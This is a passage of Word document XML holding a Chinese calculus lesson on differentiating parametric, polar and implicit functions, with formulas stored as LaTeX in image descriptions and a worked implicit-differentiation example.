        <w:t>,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>其中</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="314325" cy="200025"/>
            <wp:effectExtent l="0" t="0" r="9525" b="9525"/>
            <wp:docPr id="81" name="图片 81" descr="说明: \ph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说明: \phi (t)"/>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Pr>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>和</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="323850" cy="200025"/>
            <wp:effectExtent l="0" t="0" r="0" b="9525"/>
            <wp:docPr id="80" name="图片 80" descr="说明: \ps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说明: \psi (t)"/>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Pr>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>可导，且</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="685800" cy="200025"/>
            <wp:effectExtent l="0" t="0" r="0" b="9525"/>
            <wp:docPr id="79" name="图片 79" descr="说明: x=\ps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说明: x=\psi (t)"/>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sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>严格单调</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>(?)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>，</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="723900" cy="209550"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="78" name="图片 78" descr="说明: \psi '(t)\neq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说明: \psi '(t)\neq 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Pr>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>，根据复合函数求导法则和反函数求导法则可得参数方程的导数为：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="2581275" cy="485775"/>
            <wp:effectExtent l="0" t="0" r="9525" b="9525"/>
            <wp:docPr id="77" name="图片 77" descr="说明: {\frac  {dy}{dx}}={\frac  {dy}{dt}}\cdot {\frac  {dt}{dx}}={\frac  {dy}{dt}}\cdot {\frac  {1}{{\frac  {dx}{dt}}}}={\frac  {\phi '(t)}{\ps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说明: {\frac  {dy}{dx}}={\frac  {dy}{dt}}\cdot {\frac  {dt}{dx}}={\frac  {dy}{dt}}\cdot {\frac  {1}{{\frac  {dx}{dt}}}}={\frac  {\phi '(t)}{\psi '(t)}}"/>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81275" cy="485775"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>对于</w:t>
      </w:r>
      <w:hyperlink r:id="rId130" w:tooltip="极坐标（页面不存在）" w:history="1">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="ab"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:color w:val="A55858"/>
            <w:sz w:val="18"/>
            <w:szCs w:val="18"/>
          </w:rPr>
          <w:t>极坐标</w:t>
        </w:r>
      </w:hyperlink>
      <w:hyperlink r:id="rId131" w:tooltip="方程" w:history="1">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="ab"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:color w:val="0B0080"/>
            <w:sz w:val="18"/>
            <w:szCs w:val="18"/>
          </w:rPr>
          <w:t>方程</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="1219200" cy="571500"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="76" name="图片 76" descr="说明: {\begin{cases}x=\rho (\theta )\cos \theta \\y=\rho (\theta )\sin \theta \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说明: {\begin{cases}x=\rho (\theta )\cos \theta \\y=\rho (\theta )\sin \theta \end{cases}}"/>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219200" cy="571500"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>，根据参数方程的求导法则可得极坐标方程的导数为：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="2943225" cy="485775"/>
            <wp:effectExtent l="0" t="0" r="9525" b="9525"/>
            <wp:docPr id="75" name="图片 75" descr="说明: {\frac  {dy}{dx}}={\frac  {\left[\rho (\theta )\sin \theta \right]'}{\left[\rho (\theta )\cos \theta \right]'}}={\frac  {\rho _{{\theta }}^{{'}}\sin \theta +\rho \cos \theta }{\rho _{{\theta }}^{{'}}\cos \theta -\rho \sin \th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说明: {\frac  {dy}{dx}}={\frac  {\left[\rho (\theta )\sin \theta \right]'}{\left[\rho (\theta )\cos \theta \right]'}}={\frac  {\rho _{{\theta }}^{{'}}\sin \theta +\rho \cos \theta }{\rho _{{\theta }}^{{'}}\cos \theta -\rho \sin \theta }}"/>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943225" cy="485775"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:pPr>
        <w:pStyle w:val="6"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="mw-headline"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>隐函数的求导</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>有关隐函数的定义，参见</w:t>
      </w:r>
      <w:hyperlink r:id="rId134" w:tooltip="隐函数（页面不存在）" w:history="1">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="ab"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:color w:val="A55858"/>
            <w:sz w:val="18"/>
            <w:szCs w:val="18"/>
          </w:rPr>
          <w:t>隐函数</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:rPr>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>隐函数的求导方法的基本思想是要把</w:t>
      </w:r>
      <w:hyperlink r:id="rId135" w:tooltip="方程" w:history="1">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="ab"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:color w:val="0B0080"/>
            <w:sz w:val="18"/>
            <w:szCs w:val="18"/>
          </w:rPr>
          <w:t>方程</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="914400" cy="200025"/>
            <wp:effectExtent l="0" t="0" r="0" b="9525"/>
            <wp:docPr id="74" name="图片 74" descr="说明: F(x,y)=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说明: F(x,y)=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sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>中的看作</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="104775" cy="85725"/>
            <wp:effectExtent l="0" t="0" r="9525" b="9525"/>
            <wp:docPr id="73" name="图片 73"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的函数</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="342900" cy="200025"/>
            <wp:effectExtent l="0" t="0" r="0" b="9525"/>
            <wp:docPr id="72" name="图片 72" descr="说明: y(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说明: y(x)"/>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Pr>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>，方程两端对</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="104775" cy="85725"/>
            <wp:effectExtent l="0" t="0" r="9525" b="9525"/>
            <wp:docPr id="71" name="图片 71"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求导，然后再解出隐函数的导数</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="209550" cy="390525"/>
            <wp:effectExtent l="0" t="0" r="0" b="9525"/>
            <wp:docPr id="70" name="图片 70" descr="说明: {\frac  {dy}{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说明: {\frac  {dy}{dx}}"/>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Pr>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>给出一个例子来进一步说明：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>试求由方程</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="1247775" cy="219075"/>
            <wp:effectExtent l="0" t="0" r="9525" b="9525"/>
            <wp:docPr id="69" name="图片 69" descr="说明: {\sqrt  {x}}+{\sqrt  {y}}={\sqrt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说明: {\sqrt  {x}}+{\sqrt  {y}}={\sqrt  {a}}"/>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247775" cy="219075"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>所确定的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="95250" cy="123825"/>
            <wp:effectExtent l="0" t="0" r="0" b="9525"/>
            <wp:docPr id="68" name="图片 68" descr="说明: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说明: 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Pr>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>关于</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="104775" cy="85725"/>
            <wp:effectExtent l="0" t="0" r="9525" b="9525"/>
            <wp:docPr id="67" name="图片 67"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的隐函数的导数</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="209550" cy="390525"/>
            <wp:effectExtent l="0" t="0" r="0" b="9525"/>
            <wp:docPr id="66" name="图片 66" descr="说明: {\frac  {dy}{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说明: {\frac  {dy}{dx}}"/>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Pr>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>，其中</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="752475" cy="200025"/>
            <wp:effectExtent l="0" t="0" r="9525" b="9525"/>
            <wp:docPr id="65" name="图片 65" descr="说明: (x,y&g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说明: (x,y&gt;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Pr>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>解：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>方程的两边同时对</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="104775" cy="85725"/>
            <wp:effectExtent l="0" t="0" r="9525" b="9525"/>
            <wp:docPr id="64" name="图片 64"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求导得：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="1524000" cy="457200"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="63" name="图片 63" descr="说明: {\frac  {d(x^{{{\frac  {1}{2}}}}+y^{{{\frac  {1}{2}}}})}{dx}}={\frac  {d{\sqrt  {a}}}{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说明: {\frac  {d(x^{{{\frac  {1}{2}}}}+y^{{{\frac  {1}{2}}}})}{dx}}={\frac  {d{\sqrt  {a}}}{dx}}"/>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24000" cy="457200"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="1809750" cy="390525"/>
            <wp:effectExtent l="0" t="0" r="0" b="9525"/>
            <wp:docPr id="62" name="图片 62" descr="说明: {\frac  {1}{2}}x^{{-{\frac  {1}{2}}}}+{\frac  {1}{2}}y^{{-{\frac  {1}{2}}}}\cdot {\frac  {dy}{d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说明: {\frac  {1}{2}}x^{{-{\frac  {1}{2}}}}+{\frac  {1}{2}}y^{{-{\frac  {1}{2}}}}\cdot {\frac  {dy}{dx}}=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809750" cy="390525"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="1676400" cy="400050"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="61" name="图片 61" descr="说明: {\frac  {dy}{dx}}=-{\sqrt  {{\frac  {y}{x}}}}(x,y&g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说明: {\frac  {dy}{dx}}=-{\sqrt  {{\frac  {y}{x}}}}(x,y&gt;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676400" cy="400050"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>通过例题，应当注意方程两边求导的对象是</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="104775" cy="85725"/>
            <wp:effectExtent l="0" t="0" r="9525" b="9525"/>
            <wp:docPr id="60" name="图片 60"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而</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="95250" cy="123825"/>
            <wp:effectExtent l="0" t="0" r="0" b="9525"/>
            <wp:docPr id="59" name="图片 59" descr="说明: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说明: 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Pr>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>是用</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="104775" cy="85725"/>
            <wp:effectExtent l="0" t="0" r="9525" b="9525"/>
            <wp:docPr id="58" name="图片 58"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表示的，相当于一个</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="104775" cy="85725"/>
            <wp:effectExtent l="0" t="0" r="9525" b="9525"/>
            <wp:docPr id="57" name="图片 57" descr="说明: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说明: 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Pr>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>的复合函数，故根据复合函数的求导法则：</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="1438275" cy="228600"/>
            <wp:effectExtent l="0" t="0" r="9525" b="0"/>
            <wp:docPr id="56" name="图片 56" descr="说明: [f(y)]'=f'(y)\cdot y_{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说明: [f(y)]'=f'(y)\cdot y_{x}^{{'}}"/>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r>
        <w:rPr>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>。本题中</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="2752725" cy="390525"/>
            <wp:effectExtent l="0" t="0" r="9525" b="9525"/>
            <wp:docPr id="55" name="图片 55" descr="说明: f(y)={\sqrt  {y}},f'(y)={\frac  {1}{2}}y^{{-{\frac  {1}{2}}}},y_{x}^{{'}}={\frac  {dy}{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说明: f(y)={\sqrt  {y}},f'(y)={\frac  {1}{2}}y^{{-{\frac  {1}{2}}}},y_{x}^{{'}}={\frac  {dy}{dx}}"/>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52725" cy="390525"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:pPr>
        <w:pStyle w:val="6"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="mw-headline"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>高阶导数</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>参数方程的高阶求导</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>对于</w:t>
      </w:r>
      <w:hyperlink r:id="rId146" w:tooltip="参数方程（页面不存在）" w:history="1">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="ab"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:color w:val="A55858"/>
            <w:sz w:val="18"/>
            <w:szCs w:val="18"/>
          </w:rPr>
          <w:t>参数方程</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:rPr>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>：</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="819150" cy="571500"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="54" name="图片 54" descr="说明: {\begin{cases}x=\psi (t)\\y=\phi (t)\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说明: {\begin{cases}x=\psi (t)\\y=\phi (t)\end{cases}}"/>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19150" cy="571500"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>，其中</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="314325" cy="200025"/>
            <wp:effectExtent l="0" t="0" r="9525" b="9525"/>
            <wp:docPr id="53" name="图片 53" descr="说明: \ph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说明: \phi (t)"/>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Pr>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>和</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="323850" cy="200025"/>
            <wp:effectExtent l="0" t="0" r="0" b="9525"/>
            <wp:docPr id="52" name="图片 52" descr="说明: \ps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说明: \psi (t)"/>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Pr>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>二阶可导，且</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="723900" cy="209550"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="51" name="图片 51" descr="说明: \psi '(t)\neq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说明: \psi '(t)\neq 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Pr>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>，则由</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:drawing>
